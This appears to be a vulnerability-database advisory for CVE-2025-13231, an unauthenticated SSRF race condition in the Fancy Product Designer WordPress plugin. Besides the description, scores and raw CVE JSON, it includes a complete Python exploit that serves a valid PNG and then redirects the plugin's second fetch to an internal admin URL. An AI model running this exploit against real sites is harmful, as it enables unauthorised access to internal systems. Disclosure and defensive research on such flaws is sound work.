Security Vulnerability Report
CVE-2025-13231 CVSS 6.5 MEDIUM

CVE-2025-13231

Published: 2025-12-16 09:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Fancy Product Designer plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.4.8. This is due to a time-of-check/time-of-use (TOCTOU) race condition in the 'url' parameter of the fpd_custom_uplod_file AJAX action. The plugin validates the URL by calling getimagesize() first, then later retrieves the same URL using file_get_contents(). This makes it possible for unauthenticated attackers to exploit the timing gap to perform SSRF attacks by serving a valid image during validation, then changing the response to redirect to arbitrary internal or external URLs during the actual fetch.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Fancy Product Designer plugin for WordPress <= 6.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import http.server
import socketserver
import threading
import time

import requests


# Attacker-controlled server that exploits the TOCTOU race condition:
# the first fetch (validation) sees a real image, the second fetch
# (retrieval) is redirected elsewhere.
class TOCTOUHandler(http.server.BaseHTTPRequestHandler):
    def log_message(self, format, *args):
        pass  # Suppress server logs

    def do_GET(self):
        # Count requests across the server instance
        if not hasattr(self.server, 'request_count'):
            self.server.request_count = 0
        self.server.request_count += 1

        if self.server.request_count == 1:
            # First request: return a minimal valid PNG (8x8 pixel) so that
            # getimagesize() succeeds
            png_data = (
                b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x08\x00\x00\x00\x08'
                b'\x08\x02\x00\x00\x00\xef\x0b\x89\x6d\x00\x00\x00\x0cIDATx\x9cc\xf8'
                b'\x0f\x00\x00\x01\x01\x00\x05\x18\xd8N\x00\x00\x00\x00IEND\xaeB`\x82'
            )
            self.send_response(200)
            self.send_header('Content-Type', 'image/png')
            self.send_header('Content-Length', str(len(png_data)))
            self.end_headers()
            self.wfile.write(png_data)
        else:
            # Subsequent requests: redirect to the internal target
            redirect_url = 'http://127.0.0.1:80/admin/config.php'
            self.send_response(302)
            self.send_header('Location', redirect_url)
            self.end_headers()


def start_attack_server(port=8888):
    with socketserver.TCPServer(('', port), TOCTOUHandler) as httpd:
        httpd.handle_request()  # Handle first request (validation fetch)
        httpd.handle_request()  # Handle second request (actual fetch)


def exploit_ssrf(target_url, attacker_server):
    # Start the malicious server in a background thread
    server_thread = threading.Thread(target=start_attack_server, daemon=True)
    server_thread.start()
    time.sleep(0.1)  # Ensure the server is ready

    # Trigger SSRF via the vulnerable AJAX endpoint
    vuln_endpoint = f'{target_url}/wp-admin/admin-ajax.php'
    payload = {
        'action': 'fpd_custom_uplod_file',
        'url': f'http://{attacker_server}/image.png',
    }
    try:
        response = requests.post(vuln_endpoint, data=payload, timeout=10)
        print(f'Status: {response.status_code}')
        print(f'Response: {response.text[:500]}')
        return response
    except Exception as e:
        print(f'Error: {e}')
        return None


if __name__ == '__main__':
    # Configuration
    TARGET = 'http://vulnerable-site.com'
    ATTACKER = 'attacker.com:8888'
    print('[*] CVE-2025-13231 TOCTOU SSRF Exploit')
    print(f'[*] Target: {TARGET}')
    print(f'[*] Attacker Server: {ATTACKER}')
    exploit_ssrf(TARGET, ATTACKER)
```

References

https://support.fancyproductdesigner.com/support/discussions/topics/13000036024
https://www.wordfence.com/threat-intel/vulnerabilities/id/c56ec6ae-5b75-4cbb-aedd-f318fddc7bf0?source=cve

Weakness: CWE-362
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13231",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T09:15:51.813",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.4.8. This is due to a time-of-check/time-of-use (TOCTOU) race condition in the 'url' parameter of the fpd_custom_uplod_file AJAX action. The plugin validates the URL by calling getimagesize() first, then later retrieves the same URL using file_get_contents(). This makes it possible for unauthenticated attackers to exploit the timing gap to perform SSRF attacks by serving a valid image during validation, then changing the response to redirect to arbitrary internal or external URLs during the actual fetch."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-362"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.fancyproductdesigner.com/support/discussions/topics/13000036024",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c56ec6ae-5b75-4cbb-aedd-f318fddc7bf0?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```